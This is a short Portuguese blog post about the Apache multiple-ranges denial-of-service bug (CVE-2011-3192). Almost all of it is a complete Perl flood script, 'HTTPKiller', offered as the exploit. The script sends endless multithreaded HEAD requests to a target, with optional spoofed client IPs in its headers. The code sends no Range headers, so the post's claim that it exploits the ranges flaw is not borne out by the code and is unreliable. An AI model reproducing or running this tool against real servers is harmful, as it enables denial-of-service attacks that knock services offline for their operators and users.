O servidor web Apache versões abaixo da 2.2.20 esta vulneravel a DoS (multiple ranges DoS). Esta vulnerabilidade tem o CVE ID CVE-2011-3192. Já foi publicado um simples código em perl que explora essa vulnerabilidade, consumindo CPU e memória do servidor.
Segue abaixo o código em perl para explorar essa vulnerabilidade:
# HTTPKiller - FHTTP Kit by Xianur0
# Copyright (C) 2011 Oscar GarcÃa López (http://hackingtelevision.blogspot.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
#
# xianur0.null@gmail.com
# http://hackingtelevision.blogspot.com/
package control;
my $ip;
sub new {
my ($class,$i) = @_;
$ip = $i;
my $self={};
$ip = $i;
bless $self, $class;
return $self;
}
sub mas {
my ($self,$veces) = @_;
$veces = 1 if($veces eq "");
my ($a,$e,$o,$b) = split(/\./,$ip);
for($as=0;$as<$veces;$as++) {
$b++;
if($b>=255) {$b=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
die("No mas IPs!\n") if($a>=255);
}
$ip = join "",$a,".",$e,".",$o,".",$b;
return $ip;
}
1;
package main;
use Socket;
use IO::Socket::INET;
use threads ('yield',
'exit' => 'threads_only',
'stringify');
use threads::shared;
my $ua = "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0";
my $method = "HEAD";
my $hilo;
my @vals = ('a','b','c','d','e','f','g','h','i','j','k','l','n','o','p','q','r','s','t','u','w','x','y','z',0,1,2,3,4,5,6,7,8,9);
my $randsemilla = "";
for($i = 0; $i < 30; $i++) {
$randsemilla .= $vals[int(rand($#vals))];
}
sub socker {
my ($remote,$port) = @_;
my ($iaddr, $paddr, $proto);
$iaddr = inet_aton($remote) || return false;
$paddr = sockaddr_in($port, $iaddr) || return false;
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) || return false;
return SOCK;
}
sub sender {
my ($max,$puerto,$host,$file) = @_;
my $sock;
while(true) {
my $paquete = "";
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $puerto, Proto => 'tcp');
unless($sock) {
print "\n[x] Unable to connect...\n\n";
sleep(1);
next;
}
for($i=0;$i<$porconexion;$i++) {
$ipinicial = $sumador->mas();
my $filepath = $file;
$filepath =~ s/(\{mn\-fakeip\})/$ipinicial/g;
$paquete .= join "",$method," /",$filepath," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nCLIENT-IP: ",$ipinicial,"\r\nX-Forwarded-For: ",$ipinicial,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
}
$paquete =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
print $sock $paquete;
}
}
sub sender2 {
my ($puerto,$host,$paquete) = @_;
my $sock;
my $sumador :shared;
while(true) {
$sock = &socker($host,$puerto);
unless($sock) {
print "\n[x] Unable to connect...\n\n";
next;
}
print $sock $paquete;
}
}
sub comenzar {
$SIG{'KILL'} = sub { print "Killed...\n"; threads->exit(); };
$url = $ARGV[0];
print "URL: ".$url."\n";
$max = $ARGV[1];
$porconexion = $ARGV[2];
$ipfake = $ARGV[3];
if($porconexion < 1) {
print "[-]Invalid arg 3...\n";
exit;
}
if($url !~ /^http:\/\//) {
die("[x] Invalid URL!\n");
}
$url .= "/" if($url =~ /^http?:\/\/([\d\w\:\.-]*)$/);
($host,$file) = ($url =~ /^http?:\/\/(.*?)\/(.*)/);
$puerto = 80;
($host,$puerto) = ($host =~ /(.*?):(.*)/) if($host =~ /(.*?):(.*)/);
$file =~ s/\s/%20/g;
print join "","[!] Launching ",$max," threads!\n";
$file = "/".$file if($file !~ /^\//);
print join "","Target: ",$host,":",$puerto,"\nPath: ",$file,"\n\n";
# entonces toca un paquete unico, no tiene caso que se genere por cada hilo :)...
if($ipfake eq "") {
# envio repetitivo
my $paquetebase = join "",$method," /",$file," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
$paquetesender = "";
$paquetesender = $paquetebase x $porconexion;
$paquetesender =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender2', ($puerto,$host,$paquetesender));
}
} else {
# envio con ip...
$sumador = control->new($ipfake);
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender', ($porconexion,$puerto,$host,$file));
}
}
print "[-] Launched!\n";
for($v=0;$v<$max;$v++) {
if ($thr[$v]->is_running()) {
sleep(3);
$v--;
}
}
print "Fin!\n";
}
if($#ARGV > 2) {
comenzar();
} else {
die("Use: mn.pl [url] [Connections] [Requests per connection] [Initial false IP (optional)]\n");
}
Tenha consciência dos seus atos.
by Osvaldo
Nenhum comentário:
Postar um comentário